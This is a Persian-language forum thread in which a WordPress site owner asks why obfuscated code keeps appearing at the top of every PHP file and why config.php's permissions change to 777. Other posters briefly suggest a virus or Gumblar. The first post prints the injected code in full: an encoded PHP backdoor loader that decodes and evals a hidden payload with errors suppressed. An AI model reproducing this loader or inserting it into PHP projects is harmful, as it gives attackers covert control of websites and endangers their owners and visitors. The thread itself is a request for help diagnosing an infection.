• 0 رای - 0 میانگین
  • 1
  • 2
  • 3
  • 4
  • 5
کدهای عجیب در ابتدای همه فایلهای PHP
#1
Bug 
سلام
چند وقتیه همه ی فایل های php من در ابتداشون یکسری کدهای عجیب غریب اضافه میشه که ازشون سر در نمیارم.

ممنون میشم اگر یکی از دوستان بررسیش کنه و بگه این چیه!

در ضمن وقتی وردپرس نصب میکنم، بعد از چند روز این کدها اضافه میشه به همه ی فایلها و پرمیژن فایل config.php هم به 777 تغییر میکنه!

کد:
<?php $deoxgtpigb = '%x7825j^%x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%x5c%x7824-%x5cc%x7825c:>1<%x5c%x7825b:>1<!gps)%x5c%x7825j:>1<%x5c%dujpo)##-!#~<#%x5c%x782ofuopd%x5c%x7860ufh%ftmbg!osvufs!|ftmf!~<**9.-j%x5c%x7825-bubE{h_SEEB%x5c%x7860FUPNFS&d_SFSFGFS%x5c%x7860QUUI&c_UOFHB%x5)m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):fmj7824-%x5c%x7824<%x5c%x78c%x7825bG9}:}.}-}!#*<%x5c%x7825nfd>%x5c5b:>%x5c%x7825s:%x5c%x785c%x5c%x7825x5c%x7825ff2!>!bssbz)%x5c%x7824]25%x5c%x7824-%x5c%x782f7^#iubq#%x5c%x785cq%x5c%x7825%x5c%x7827jsv%x5c%x78256<C>^#zsfvr#%x5%x7825c:>%x5c%x7825s:%x5c%x785c%1-r%x5c%x7825)s%x5c%x7825>%x5c%x782fh%x5c%},;uqpuft%x5c%x7860msvd}+;!>!}%x5c%x7827;!>x78246767~6<Cw6<pd%x5c%x7825w6Z6<.5%x5c%x7860hA%x5UFS,6<*msv%x5c%x782575c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.3%x5c%x7860hA%x52f%50%x2e%52%x29%57%x65","%x65%1667825j=tj{fpg)%x5c%x7825%x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5c%x7860gvo{ftmfV%x5c%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5c%z>3<!fmtf!%x5c%x7825z>2<!%x5c%x7c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.4%x5c%x7860hA%xy6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825ggg)(0)%x5c%x%x782f%x5c%x7825z<jg!)%x5c%x7825z>>2*!%x5c%x7825%x7860439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*##}C;!>>!}W;utpi}Y;tu%x5c%x7825!-#2#%x5c%x782f#%x5c%x7825#%x5c%x782f#o]#%x5c%x782f*)323zbe!]275L3]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]y6d]281Ld]245]K28257>%x5c%x782272qj%x5cc%x7878W~!Ypp2)%x5c%x%156%x75%156%x61"]=1; function fjfgg($n){return chr(ord($n)c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.2%x5c%x7860hA%x5c%x782%x5c%x7860{6:!}7;!}6;3e]81#%x5c%x782f#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6**f%x5c%x7827,*e%x5c%x7827y3:]62]y4c#<!%x5c%x7825t::!>!%+{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x7825)+opjudovg+)!gj+%x5c%x782f#00;quui#>.%x5c%x7825!<*s%x5c%x7860un>qp%x5c%x7825!|8:!>#]y3g]61]y3f]63]y3:]68]y76#<%x5c%x78e%x5c%x78b%x5c%x7825w:!>!%x5c%%x7825fdy<Cb*[%x5c%x7825h!>!%x5c%x7825tdz)%x5c%x7825b#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x78255c%x787f%x5c%x787f%x5c%x78x5c%x7825}U;y]}R;2]},;osvufs}%x5c%x7827;mnui}&;zepc}A;~!}%x%x5c%x7825>j%x5c%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)x782f%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%22%51%x29%51%x29%73", NULL); })!gj!|!*bubE{h%x5c%x7825)j{hnpd5csboe))1%x5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%x%x7860sfqmbdf)%x5c%x7825%5}X;!sp!*#opo#>>}R;msv}.;%x5c%x782c%x7825tww**WYsboepn)%x5c%x7825bss-%x5c%x78bqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%pmdXA6|7**197-2qj%x5c%x78257-K)udfoopdXA%x5c%x7822)7-1);} @error_reporting(0); preg_replace("%x*qp%x5c%x7825-*.%x5c%x7825)euhA)3of>22)gj6<^#Y#%x5c%x785cq%x5c%x7825%x5c%x78gj6<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x7860LDPT7-UFOJ%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*17-SFEBFI,6ufhA%x5c%x78272qj%x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257825%x5c%x787f!<X>b%x5c%x7825Z<#opo#>b%x5c%x7825!*##>>X)!gjZ<#opo#>bc%x782f7rfs%x5c%x78256<#o]1%i%x5c%x7878:<##:>:h%x5c%x78x7825:<**#57]38y]47]67y]37m!|!*5!%x5c%x7827!hmg%x5c%x7825)!gj!|!*1?x78b%x5c%x7825ggg!>!#]y81]273]y76]258]7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%x5c%x785c%x5cdrr)%x5c%x7825r%x5c%x7878Bsfuvso!sboex787f_*#fubfsdXk5%x5c%x7860{66~6<&w6<%x5c%x787fw6*CW&)7gj6<*doj%x5c%-MSV,6<*)ujojR%x5c%x7827id%x5c%x78256<%x5c%x787fw6*%x5c%xw>#]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#5c%x78256~6<%x5c%x787fw6<*K)ftx7825)tpqsut>j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%x5c%x7825,3,jfwjidsb%x5c%x7860bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fep%x5c%x7825}K;%x5c%x7860pn)%x5c%x7825epnbss-%x5c%x7825r%x5%x5c%x7825!**X)ufttj%x5c%x7822)gj!|!*nbsbq%x55cSFWSFT%x5c%x7860%x5c%x782!opjudovg!|!**#j{hnpd#)tutjyf%x5c%x7860opjudovg%x5sutcvt)esp>hmg%x5c%x7825!<12>j%x5c%x7825!|!*#91y]c9y]gc%x7825)hopm3qjA)qj3hopmA%x5c%x78273qj%x5c%x78256<*Y%x5c%x7825)fnbozcYC#-#O#-#N#*%x5c%x7824%x5c%>>!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%x5c%x787f!>>%x5c%x725h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x7825{**#k#)tutjyf%x5c%x7860%x5c%x7878%x5c%x7822l:!}V;3q%164%50%x22%134%x78%62%x35%165%x3a%146%x21%76%x21%50%x5c%x7825%x5c%x787kj:!>!#]y3d]51]y35]256]y76]72]y3d]51]y35]274]y4:]82]782f+*0f(-!#]y76]277]y72]265]y39]271]y8j:.2^,%x5c%x7825b:<!%x5c-#jt0*?]+^?]_%x5c%x785c}X%x5c<!%x5c%x7825tww!>!%x5c%x782400~:<h%x5c%x7825_t%x5c%x7825:osvufs:~:<*9-<*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x81]273]y76]258]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5]DgP5]D6#<%x5c%x7825fdy>#]D425r%x5c%x7878B%x5c%x78]285]Ke]53Ld]53]Kc]55Ld]55#*<%x5>}&;!osvufs}%x5c%x787f;!opjudovg}k~~9{d%x5c%x7825:osvufs:~928>>%x25)7fmji%x5c%x78786<C%x5c%x7827&6<*rfs%x5c%x78257-K)fq%x5c%x7825>2q%x5c%x7825<#g6R85,67R37,18R#>q%x3]256]y78]248]y83]256]y81]265]y72]254]825ww2)%x5c%x7825w%x5c%x7860TW~x5c%x78257>%x5c%x782f7&6|7**111127-K)ebfsX%x5c%x7827u%x5c%x78%x7860{6~6<tfs%x5c%x787f<u%x5c%x7825V%x5c%x7827{ftmfV%x5c%x787f<*X&Z&Sc%x7825:|:*r%x5c%x7825:-t%x5c%x7825)3of:opjudovg<~%x5c%x7825)sutcvt)fubmgoj{hA!osvufs!~<3,j%x5c%x78x5c%x7824Ypp3)%x5c%x7825cB%x5c%x7825iN}#-!tussfw)%x5c%x7827827{**u%x5c%x7825-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-u24-!%x5c%x7825%x5c%x]278]225]241]334]368]322]3]364]6]283]427]36]373P6]36]737824-%x5c%x7824-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c7%x5c%x782f7#@#7%x5c%x785c%x7827&6<%x5c%x787fw6*%x5c%x787f_*#[k5c%x787f;!|!}{;)gj}l;33bq}k;op#Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5%x7825)54l}%x5c%x7827;%x5c%x7825!<*#}_;#)323ldfid4}472%x5c%x7824<!%x5c%x7825mm!>!#]yy]672]48y]#>s%x5c%x7825<#462]47y]252]18y]#>q%x5c%x782mqnj!%x5c%x782f!#0#)idubn%x5cjudovg}%x5c%x7878;0]=])0#)U!%x5c%xc%x7827doj%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fmjgk4%x5cZ~!<##!>!2p%x5c%x7825!|!*!***b%x5c%x7825)sf%x5c%x7878pmpusut!-#bT-%x5c%x7825bT-%x5c%x7825hW~%x5c%x7825fdy)##-!#~<%x5c%x7825h00#*<2985-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]yx5f%155%x61%160%x28%42%x66%152%x66273]y72]282#<!%x5c%x7825tjw!>!#x5c%x782f20QUUI7jsv%x5c%x78257UFH#%x5c%x7827rfs%x#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#)}.;%x5c%x7860UQPMSVD!-id%x5c%x7825)uqpuft%x5c%x7860msvd]88y]27]28y]#%x5c%x782fr%xf*#npd%x5c%x782f#)rrd24gps)%x5c%x7825j>1<%x5c%x58]24]31#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5c%x78!{e%x5c%x7825)!>>%x5c%x7877]y72]265]y39]274]y85%147%x67%42%x2c%163%x74%162%x5f%163%x70%154%x69%f-s.973:8297f:5297e:56-%x5c%x7878r.985:54%x5c%x7824-%x5c%x7824]y8%x5c%x7824-%x5c%x7824]26%x5c%x25:<#64y]552]e7y]#>n%x5c%x7825<#372]58y]472]37f#%x5c%x782f#%x5c%x782f},;#-#}+;%x5c%x7825-qp%x5cmmvo:>:iuhofm%x5c%x7825:{e%x5c%x7825!osvufs!*!+A!>jpo!%x5c%x7824-%x5c%x7824y7%x5c%x7824-%x5c%x7824*<!%x5c%x7824-%x5c%x78]72]K9]78]K5]53]Kc#<%x5c%x7825tpz!>!#]D6M7]K3#<%5c%x7825V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%x5c%x7825)kV%x5c%x787825j,,*!|%x5c%x7824-%x5c%x7824gvodufujs%x5c%x7878X6<#o]o]Y%x5c%x78257;utpI#7>%x5-5ppde:4:|:**#ppde#)tutjyf%x5c%x78604%x5c%x78223}!+!<]y43]78]y33]65]y31]55]y85]82]y76]62]y3:]84#-!OVMM*<%x%x61%154%x28%151%x6d%160%x6c%157%x64%145%x28%141%x72%162%x61%171%%x6f%142%x5f%163%x74%141%x72%164") && (!isset($GLOBALS["%x6x7825V<#65,47R25,d7R17,67R37,#%x53of)fepdof%x5c%x786057ftbc%x5c%x787f!|!*uyfu%x5c%x7ut)tpqssutRe%x5c%x7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!x5c%x7825j:^<!%x5c%x7825w%x7825)7gj6<**2qj%x5c%x7860GB)fubfsdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x7c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)323zbek!~!<b%x5c%x5c%x782f%x5c%x7825r%x5c%x7878<~!!%x5c%x7825s:N}#-%x5c%x7825o:W%x5c%x7822)!gj}1~!<2p%x5c%x7825%x5c%x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c%x7s]o]s]#)fepmqyf%x5c%%x7824<!%x5c%x7825tzw>!#]y76]2>>1*!%x5c%x7825b:>1<!fmtf!%x5c%x782%x5c%x7825wN;#-Ez-1H*WCw*<*127-UVPFNJU,6<*27-SFGTOBSUOSVx5c%x7825)ftpmdR6<*id%x55c*W%x5c%x7825eN+#Qi%x5c%x785c1^W%x5c%x7825c!>!%x5c%x78255c%x7825%x5c%x782fh%x5c%x7824-%x5c%x7824y!opjudovg}{;#)tutjyf%x5c%x7860opjudovg)!gj!|!*msv%x5c%x7825)}k~~~<]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%x5c%x7825tdz>#L4x78257-C)fepmqnjA%x5c%x7827&6<.fmjgA%x5f%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqmpef)#%x5c%x7824*<!%x5c%x78255c%x7822:ftmbg39*56A:>:8:|:7#6#)tutjyf%x5csutcvt-#w#)ldbqov>*ofmy%x5c%x7825)utjx5c%x78256|6.7eu{66~67<&w6<*&7-#o]c%x785cq%x5c%x78257**^#zsfvr#%x5c%x785cq%x5c%x7825)ufttj%x5c%x78x7827*&7-n%x5c%x7825)utjm6<%x5c%x787fw6*CW&)7gj6<*K)ftpmdXA6~6<u%%x7825tzw%x5c%x782f%x5c%x7824)#P#-#Q%x5c%x7825nfd)##Qtpz)#]341]88M4P8]372y]#>>*4-1-bubE{h%x5c%x7825)sutcvt%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!hmg%x5c%x7825)!gj!<**2-4-bubE{h%x5c%x7825),*d%x5c%x7827,*c%x5c%x7827,*b%x5c%x7827)fepdof.)fepdof.%x5c%x782f#@)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7822#)fepmqyfA>2b%x5c%x7825!<5<#762]67y]562]38y]572]48y]#>m%x57825zB%x5c%x7825z>!tussfw)%x5c%x7825zW%x5c%x7825h>EzH,2W]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<%x5c%x7825tmw!>!#]y84]83]238M7]381]211M5]67]452]88]5]48]%x7860hfsq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5c%x7878pmpus32M3]317]445]212]445]43]321]464]284]364]6]234]342]gps)%x5c%x7825j>1<%x5c%x7825827k:!ftmf!}Z;^nbsbq%x5c%x7825%x5c%x78j=6[%x5c%x7825ww2!>#p#%x5c%x782f#p#%x5c7860QIQ&f_UTPI%x5c%x7860QUUI&ej0#!%x5c%x782f!**#sfmcnbs+yfeobz+s5c%x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%c%x782fq%x5c%x7825>U<#16,47R57,27R66,#%x5c%x78225w6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x5c%x7825)n%x5c%x7825-2bd%x5c%x7825!<5h%x5c%x7825%x5c%x782f#0#%x5c%x7821%156%x75%156%x61"])))) { $GLOBALS["%x61i%x5c%x785c2^<!Ce*[!%x5c%x7825cIjQeTQcOc%x5c%x782f#00#W~!Y[!%x5c%x7825rN}#QwTW%x5c%x7825hIr%x5c%x785c1^-%x5c#%x5c%x782fqp%x5c%x7825>5h%x5c%x7825!<*::::::-111112)eob822!pd%x5c%x7825)!gj}Z;h85c2b%x5c%x7825!>!2p%x5c%x7825!*3>?*2b%x5c%x7825]275]y83]273]y76]277#<%x5c%x7825t2%x5c%x7824<!%x5c%x7825o:!>!%x5c%x78242178}527}88:}337825!-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*72!%x5c%x7827!hmg%x27Y%x5c%x78256<.msv%x5c%x7860ftsx7825j:=tj{fpg)%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:if((function_exists("]273]y6g]273]y76]271]y7d]252]y74]256]y39]252]y83]22!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV%x5c%x787f%xy76]61]y33]68]y34]68]y33]65]y31]53]y6d]28125>j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%x5c%xc%x7825)323ldfidk!~!<**qp%x5c%x7825!-uyfu%x5c%x7825)x5c%x7860fmjg}[;ldpt%x7825r%x5c%x785c2^-%x5c%x7825hOh%x5c%x782f#00#W~!%x5c%x7825t2w)#%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x7825mm)%x5c%x7825%x5c%x7878:-!%x5c%x7824b!>!%x5c%x7825yy)#}#-#%x5c%x787f_*#ujojRk3%x5c%x7860{666~6<&w6<%x5c%x787fw6*CW&)7gj6<.[A%x27pd%x5c%x78256<C%x5c%x7827pd%/(.*)/epreg_replacebepmivaowt'; $wfygxzefrv = explode(chr((175-131)),'9555,21,6807,59,9034,40,1350,59,2394,43,763,34,6742,65,5685,34,6083,48,3888,70,1726,70,636,50,946,54,707,56,1409,60,10076,30,7869,34,7298,20,7967,65,4638,61,4470,52,6591,45,2741,28,5750,49,3181,30,2342,52,2513,52,7049,54,1306,23,7029,20,3576,70,2615,58,5123,24,450,69,7903,64,2473,40,9463,32,2306,36,2992,68,7684,39,5449,58,4699,22,8920,43,7439,24,2565,50,7408,31,686,21,3060,57,10014,62,5147,39,1469,22,1159,21,136,20,9826,20,3343,23,3796,40,5854,56,593,43,3672,70,9238,24,7561,66,156,44,4819,49,9715,59,9396,67,8828,45,3211,29,3240,48,1980,57,7832,37,2822,41,8188,42,3522,54,8104,34,2109,31,3472,50,7228,70,9262,48,8297,67,2437,36,8985,49,5936,21,1664,34,1553,26,8230,67,9182,56,1698,28,5507,63,8794,34,3288,55,5386,29,8555,54,6950,54,4172,65,8764,30,200,56,7103,60,2673,68,3400,45,9774,52,6899,51,8687,38,3445,27,2229,34,6272,49,5249,49,4405,65,7790,42,1105,54,6321,24,6636,53,1609,55,6345,26,6036,25,9625,48,1895,26,4721,48,865,49,6866,33,8873,47,4522,47,6489,68,3836,52,1921,59,5186,30,5415,34,4926,52,1180,70,4073,29,7318,30,6061,22,9576,49,5719,31,8453,67,9310,34,3117,64,4102,70,551,42,2796,26,5910,26,7520,20,8963,22,1849,46,256,42,2769,27,6226,46,5333,53,8364,33,4769,50,9344,52,5298,35,4237,50,397,53,4978,20,2901,54,0,61,9980,34,5053,70,2204,25,7540,21,6171,55,298,24,6557,34,6371,70,5957,26,797,68,113,23,7723,67,3958,52,1579,30,4868,58,7463,57,9074,58,2955,37,3366,34,1329,21,8397,56,7383,25,9132,50,9846,65,5216,33,2263,43,4351,22,3742,54,6131,40,5636,49,1491,62,6441,48,4287,64,7627,57,1250,56,4373,32,322,39,1796,53,5570,66,8068,36,4998,55,8520,35,8609,50,5983,53,2140,64,7163,65,61,52,9495,60,7348,35,361,36,4049,24,519,32,7004,25,8138,50,8659,28,8725,39,1057,48,914,32,4607,31,9911,69,8032,36,5799,55,3646,26,2037,42,2863,38,1000,57,4010,39,4569,38,9673,42,6689,53,2079,30'); $mrakvrpfxb=substr($deoxgtpigb,(34854-24748),(41-34)); if (!function_exists('xquqvxnkdq')) { function xquqvxnkdq($jndhukzuyh, $qutjjkicyx) { $eoqlfsqynt = NULL; for($vfuyartssx=0;$vfuyartssx<(sizeof($jndhukzuyh)/2);$vfuyartssx++) { $eoqlfsqynt .= substr($qutjjkicyx, $jndhukzuyh[($vfuyartssx*2)],$jndhukzuyh[($vfuyartssx*2)+1]); } return $eoqlfsqynt; };} $ixdciqsjvk="\x20\57\x2a\40\x70\167\x79\161\x71\161\x74\161\x66\156\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\63\x32\55\x31\71\x35\51\x29\54\x20\143\x68\162\x28\50\x34\63\x34\55\x33\64\x32\51\x29\54\x20\170\x71\165\x71\166\x78\156\x6b\144\x71\50\x24\167\x66\171\x67\170\x7a\145\x66\162\x76\54\x24\144\x65\157\x78\147\x74\160\x69\147\x62\51\x29\51\x3b\40\x2f\52\x20\156\x65\152\x6f\156\x68\157\x6a\166\x64\40\x2a\57\x20"; $iuwnveakrw=substr($deoxgtpigb,(50156-40043),(64-52)); $iuwnveakrw($mrakvrpfxb, $ixdciqsjvk, NULL); $iuwnveakrw=$ixdciqsjvk; $iuwnveakrw=(776-655); $deoxgtpigb=$iuwnveakrw-1; ?>
  پاسخ
تشکر شده توسط :
#2
دوست عزیز
به احتمال خیلی زیاد کامپیوتر شما ویروسی شده و دلیلش همینه...قبلا مشکل مشابه شما برام پیش اومده بود.
  پاسخ
تشکر شده توسط :
#3
این مشکل توی سرور سایتم بوجود اومده، یعنی سرور ویروسی شده؟
  پاسخ
تشکر شده توسط :
#4
Gumblar هم میتونه باشه... .
  پاسخ
تشکر شده توسط :


پرش به انجمن:


کاربران در حال بازدید این موضوع: 1 مهمان